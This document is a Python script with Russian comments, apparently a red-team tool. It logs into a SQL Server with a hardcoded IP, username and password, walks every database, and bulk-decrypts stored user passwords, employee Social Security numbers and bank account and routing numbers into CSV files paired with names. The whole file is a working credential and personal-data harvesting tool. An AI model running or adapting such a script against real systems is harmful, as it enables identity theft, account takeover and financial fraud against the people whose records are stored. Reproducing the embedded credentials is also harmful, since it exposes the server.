#!/usr/bin/env python3
"""
Расшифровка ВСЕХ зашифрованных полей со всех БД через SQL Server.
Выход: CSV файлы {db}_{table}_decrypted.csv с PK + расшифрованные значения.
Эти CSV можно использовать для замены зашифрованных значений в полных дампах.
"""
import subprocess
import csv
import time
from pathlib import Path

SERVER = "50.21.183.111"
USER = "irely"
PASS = "iRely486"
OUTPUT_DIR = Path('/root/ir-assessment/redteam/irelydata/decrypted_all_fields')
OUTPUT_DIR.mkdir(exist_ok=True)

LOG_FILE = OUTPUT_DIR / 'decryption_log.txt'
SUMMARY_FILE = OUTPUT_DIR / 'decryption_summary.csv'

# Все зашифрованные поля по таблицам
# Формат: (таблица, PK поле, [(зашифрованное поле, алиас)])
ENCRYPTED_TABLES = [
    ('tblEMEntityCredential', 'intEntityCredentialId', [
        ('strPassword', 'decrypted_password'),
    ]),
    ('tblPREmployee', 'intEntityId', [
        ('strSocialSecurity', 'decrypted_ssn'),
    ]),
    ('tblEMEntityEFTInformation', 'intEntityEFTInfoId', [
        ('strAccountNumber', 'decrypted_account_number'),
    ]),
    ('tblCMBank', 'intBankId', [
        ('strRTN', 'decrypted_rtn'),
    ]),
    ('tblCMBankAccount', 'intBankAccountId', [
        ('strBankAccountNo', 'decrypted_bank_account_no'),
        ('strMICRBankAccountNo', 'decrypted_micr_bank_account_no'),
        ('strMICRRoutingNo', 'decrypted_micr_routing_no'),
    ]),
]


def sqlcmd(db, query, timeout=120):
    """Запуск sqlcmd через docker"""
    cmd = [
        "docker", "run", "--rm", "--network", "host",
        "mcr.microsoft.com/mssql/server:2022-latest",
        "/opt/mssql-tools18/bin/sqlcmd",
        "-S", SERVER, "-U", USER, "-P", PASS, "-C",
        "-d", db,
        "-Q", query,
        "-s", "|", "-W"
    ]
    try:
        result = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
        return result.stdout, result.stderr
    except subprocess.TimeoutExpired:
        return "", "TIMEOUT"


def get_databases():
    """Получить список пользовательских БД"""
    cmd = [
        "docker", "run", "--rm", "--network", "host",
        "mcr.microsoft.com/mssql/server:2022-latest",
        "/opt/mssql-tools18/bin/sqlcmd",
        "-S", SERVER, "-U", USER, "-P", PASS, "-C",
        "-Q", "SET NOCOUNT ON; SELECT name FROM sys.databases WHERE name NOT IN ('master','model','msdb','tempdb') ORDER BY name",
        "-s", "|", "-W", "-h", "-1"
    ]
    result = subprocess.run(cmd, capture_output=True, text=True, timeout=30)
    lines = [l.strip() for l in result.stdout.strip().splitlines() if l.strip()]
    # Фильтруем системные
    skip_prefixes = ('To learn', 'SQL Server', 'This container', 'user', 'visit', 'running', 'as', 'more', 'is', 'mssql', 'container')
    dbs = []
    for line in lines:
        if any(line.startswith(p) for p in skip_prefixes):
            continue
        if line in ('i21Hangfire',):
            continue
        if '\\' in line:
            continue
        dbs.append(line)
    return dbs


def table_exists(db, table):
    """Проверить существование таблицы"""
    stdout, _ = sqlcmd(db,
        f"SET NOCOUNT ON; SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME='{table}'",
        timeout=15)
    for line in stdout.strip().splitlines():
        line = line.strip()
        if line.isdigit():
            return int(line) > 0
    return False


def count_encrypted(db, table, field):
    """Подсчитать количество зашифрованных записей"""
    stdout, _ = sqlcmd(db,
        f"SET NOCOUNT ON; SELECT COUNT(*) FROM {table} WHERE {field} IS NOT NULL AND {field} != '' AND LEN({field}) > 40",
        timeout=15)
    for line in stdout.strip().splitlines():
        line = line.strip()
        if line.isdigit():
            return int(line)
    return 0


def decrypt_table(db, table, pk_field, encrypted_fields):
    """Расшифровать таблицу и сохранить результат"""
    # Строим SELECT: PK, поля для контекста, расшифрованные значения
    select_parts = [pk_field]

    # Добавляем контекстные поля
    context_fields = {
        'tblEMEntityCredential': ['strUserName'],
        'tblPREmployee': ['strFirstName', 'strLastName'],
        'tblEMEntityEFTInformation': ['intEntityId'],
        'tblCMBank': ['strBankName'],
        'tblCMBankAccount': ['strBankAccountHolder', 'intBankId'],
    }
    if table in context_fields:
        select_parts.extend(context_fields[table])

    # Добавляем расшифровку
    decrypt_selects = []
    for enc_field, alias in encrypted_fields:
        decrypt_selects.append(f"dbo.fnAESDecryptASym({enc_field}) AS {alias}")

    all_selects = select_parts + decrypt_selects
    query = f"SET NOCOUNT ON; SELECT {', '.join(all_selects)} FROM {table}"

    # WHERE: хотя бы одно поле зашифровано
    where_parts = []
    for enc_field, _ in encrypted_fields:
        where_parts.append(f"({enc_field} IS NOT NULL AND {enc_field} != '' AND LEN({enc_field}) > 40)")
    if where_parts:
        query += f" WHERE {' OR '.join(where_parts)}"

    stdout, stderr = sqlcmd(db, query, timeout=300)

    if 'Invalid object' in stderr or 'Invalid column' in stderr:
        return None, stderr

    return stdout, stderr


def parse_csv_output(text):
    """Парсинг sqlcmd вывода в список словарей."""
    lines = text.strip().splitlines()

    # Ищем строку с заголовком (содержит '|')
    header_idx = None
    for i, line in enumerate(lines):
        line = line.strip()
        if '|' in line and not line.startswith('---') and 'SQL Server' not in line and 'container' not in line and 'go.microsoft' not in line:
            header_idx = i
            break

    if header_idx is None:
        return []

    headers = [h.strip() for h in lines[header_idx].split('|')]

    rows = []
    for line in lines[header_idx + 1:]:
        line = line.strip()
        if not line or line.startswith('---') or '|' not in line:
            continue
        parts = [p.strip() for p in line.split('|')]
        if len(parts) >= 2:
            while len(parts) < len(headers):
                parts.append('')
            row = dict(zip(headers, parts))
            rows.append(row)
    return rows


def main():
    log_lines = []
    summary_rows = []

    log_lines.append(f"=== Расшифровка всех зашифрованных полей ===")
    log_lines.append(f"Время старта: {time.strftime('%Y-%m-%d %H:%M:%S')}")
    log_lines.append("")

    databases = get_databases()
    log_lines.append(f"Баз данных: {len(databases)}")

    total_records = 0
    total_tables_processed = 0

    for db_idx, db in enumerate(databases, 1):
        log_lines.append(f"\n{'='*60}")
        log_lines.append(f"[{db_idx}/{len(databases)}] {db}")
        log_lines.append(f"{'='*60}")

        for table, pk_field, encrypted_fields in ENCRYPTED_TABLES:
            # Проверяем существование таблицы
            if not table_exists(db, table):
                log_lines.append(f"  {table}: таблица не существует")
                continue

            # Подсчитываем зашифрованные записи
            first_field = encrypted_fields[0][0]
            count = count_encrypted(db, table, first_field)
            if count == 0:
                log_lines.append(f"  {table}: 0 зашифрованных записей")
                continue

            log_lines.append(f"  {table}: {count} записей с зашифрованными данными")

            # Расшифровываем
            stdout, stderr = decrypt_table(db, table, pk_field, encrypted_fields)
            if stdout is None:
                log_lines.append(f"    ERROR: {stderr[:200]}")
                continue

            rows = parse_csv_output(stdout)
            if not rows:
                log_lines.append(f"    0 записей расшифровано")
                continue

            # Сохраняем CSV
            safe_db = db.replace('\\', '_')
            csv_file = OUTPUT_DIR / f"{safe_db}_{table}_decrypted.csv"

            fieldnames = list(rows[0].keys())
            with open(csv_file, 'w', newline='', encoding='utf-8') as f:
                writer = csv.DictWriter(f, fieldnames=fieldnames)
                writer.writeheader()
                writer.writerows(rows)

            log_lines.append(f"    ✓ {len(rows)} записей -> {csv_file.name}")
            total_records += len(rows)
            total_tables_processed += 1

            # Сводка
            summary_rows.append({
                'database': db,
                'table': table,
                'encrypted_count': count,
                'decrypted_count': len(rows),
                'file': csv_file.name,
            })

    # Сохраняем лог
    with open(LOG_FILE, 'w') as f:
        f.write('\n'.join(log_lines))

    # Сохраняем сводку
    if summary_rows:
        with open(SUMMARY_FILE, 'w', newline='', encoding='utf-8') as f:
            writer = csv.DictWriter(f, fieldnames=['database', 'table', 'encrypted_count', 'decrypted_count', 'file'])
            writer.writeheader()
            writer.writerows(summary_rows)

    print('\n'.join(log_lines[-30:]))
    print(f"\n{'='*60}")
    print(f"ИТОГО: {total_records} записей из {total_tables_processed} таблиц")
    print(f"Лог: {LOG_FILE}")
    print(f"Сводка: {SUMMARY_FILE}")
    print(f"Результаты: {OUTPUT_DIR}")


if __name__ == '__main__':
    main()
